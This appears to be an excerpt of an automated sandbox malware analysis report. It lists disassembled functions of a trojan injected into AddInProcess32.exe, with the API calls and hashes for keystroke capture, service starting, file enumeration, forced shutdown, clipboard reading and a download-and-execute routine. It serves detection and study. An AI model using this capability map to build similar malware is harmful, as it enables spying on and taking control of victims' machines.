                                                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                  • String ID:
                                                                                  • API String ID: 3566172867-0
                                                                                  • Opcode ID: b347f1a6ebd5a27a3c62a6440ea9f983a5eff6272c066a99259600f45f129da1
                                                                                  • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                                                                  • Opcode Fuzzy Hash: b347f1a6ebd5a27a3c62a6440ea9f983a5eff6272c066a99259600f45f129da1
                                                                                  • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                                                                                  Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                  • String ID:
                                                                                  • API String ID: 276877138-0
                                                                                  • Opcode ID: 637da124ebd858597763fdc0195e491a5d188b8048d228e092eb7bdd2ad61358
                                                                                  • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                                                                  • Opcode Fuzzy Hash: 637da124ebd858597763fdc0195e491a5d188b8048d228e092eb7bdd2ad61358
                                                                                  • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                                                                  Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Find$CreateFirstNext
                                                                                  • String ID: H"G$`'G$`'G
                                                                                  • API String ID: 341183262-2774397156
                                                                                  • Opcode ID: 491aec702e058cc976c4f8e19fcf1970bdb99c150411e745d642373cd7af4ec7
                                                                                  • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                                                                  • Opcode Fuzzy Hash: 491aec702e058cc976c4f8e19fcf1970bdb99c150411e745d642373cd7af4ec7
                                                                                  • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                                                                  Function 00414DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                                    • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                                    • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                                    • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                                    • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                  • String ID: PowrProf.dll$SetSuspendState
                                                                                  • API String ID: 1589313981-1420736420
                                                                                  • Opcode ID: bb589c4a9e5ce4fb7329190ff839279ce61210147b3cfe0a03d1c41bdf58f902
                                                                                  • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                                                                                  • Opcode Fuzzy Hash: bb589c4a9e5ce4fb7329190ff839279ce61210147b3cfe0a03d1c41bdf58f902
                                                                                  • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                                                                                  Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                                                                                  • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 2299586839-711371036
                                                                                  • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                                                                  • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                                                                  • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                                                                  • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                                                                  Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                                                                  • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                                                                  • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID: SETTINGS
                                                                                  • API String ID: 3473537107-594951305
                                                                                  • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                                                                  • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                                                                                  • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                                                                  • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                                                                                  Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004087A5
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                                  • String ID:
                                                                                  • API String ID: 1157919129-0
                                                                                  • Opcode ID: bee7f5f2dbd26623ceae785115fe4ed72eb4a605c9ebee09c1c08c84f1d66a56
                                                                                  • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                                                                                  • Opcode Fuzzy Hash: bee7f5f2dbd26623ceae785115fe4ed72eb4a605c9ebee09c1c08c84f1d66a56
                                                                                  • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                                                                                  Function 0044F7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                  • String ID:
                                                                                  • API String ID: 745075371-0
                                                                                  • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                                                                  • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                                                                                  • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                                                                  • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                                                                                  Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040784D
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                  • String ID:
                                                                                  • API String ID: 1771804793-0
                                                                                  • Opcode ID: e4819ccc166c9f01838b68987bff0171c3af6b43d70e485e5f2840cc2cf561bf
                                                                                  • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                                                                                  • Opcode Fuzzy Hash: e4819ccc166c9f01838b68987bff0171c3af6b43d70e485e5f2840cc2cf561bf
                                                                                  • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                                                                                  Function 0040E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                                                                    • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                                                                    • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 1735047541-0
                                                                                  • Opcode ID: 4e114d2702c5c3b1962ae21d7e8eb97eb18b142e9cdca931b6ead4bb25caa921
                                                                                  • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                                                                                  • Opcode Fuzzy Hash: 4e114d2702c5c3b1962ae21d7e8eb97eb18b142e9cdca931b6ead4bb25caa921
                                                                                  • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                                                                                  Function 004063C6 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DownloadExecuteFileShell
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                                                                                  • API String ID: 2825088817-2881483049
                                                                                  • Opcode ID: 9af02d018f3fd44a8981843ad1b73823c729f3db09203ba27b131e3d49614b30
                                                                                  • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                                                                                  • Opcode Fuzzy Hash: 9af02d018f3fd44a8981843ad1b73823c729f3db09203ba27b131e3d49614b30
                                                                                  • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                                                                                  Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                                                                    • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
                                                                                    • Part of subcall function 0041215F: RegSetValueExA.KERNELBASE(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
                                                                                    • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                  • API String ID: 4127273184-3576401099
                                                                                  • Opcode ID: b8e930e406a51c142911afe7d42b80e3a9af200f2f362c56483f6d5d18d4ce76
                                                                                  • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                                                                                  • Opcode Fuzzy Hash: b8e930e406a51c142911afe7d42b80e3a9af200f2f362c56483f6d5d18d4ce76
                                                                                  • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                                                                                  Function 0044EEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0044F038
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                  • String ID:
                                                                                  • API String ID: 4212172061-0
                                                                                  • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                                                                  • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                                                                                  • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                                                                                  • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                                                                                  Function 0044F2A3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                  • String ID:
                                                                                  • API String ID: 2829624132-0
                                                                                  • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                                                                  • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                                                                                  • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                                                                                  • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                                                                                  Function 004398AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                                  • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                                                                                  • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                                                                  • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                                                                                  Function 004407B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,0044078B,?), ref: 004407D6
                                                                                  • TerminateProcess.KERNEL32(00000000,?,0044078B,?), ref: 004407DD
                                                                                  • ExitProcess.KERNEL32 ref: 004407EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                                  • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                                                                  • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                                                                  • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
                                                                                  Function 0040A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenClipboard.USER32(00000000), ref: 0040A65D
                                                                                  • GetClipboardData.USER32(0000000D), ref: 0040A669
                                                                                  • CloseClipboard.USER32 ref: 0040A671
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$CloseDataOpen
                                                                                  • String ID:
                                                                                  • API String ID: 2058664381-0
                                                                                  • Opcode ID: fc42fbe939e34f95e3da0c1deb258c5860a889e64c116dd0334dc6fce6b72752
                                                                                  • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                                                                                  • Opcode Fuzzy Hash: fc42fbe939e34f95e3da0c1deb258c5860a889e64c116dd0334dc6fce6b72752
                                                                                  • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                                                                                  Function 004329DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor
                                                                                  • String ID: P@
                                                                                  • API String ID: 2325560087-676759640
                                                                                  • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                                                  • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                                                                                  • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                                                  • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                                                                                  Function 0044BA59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .
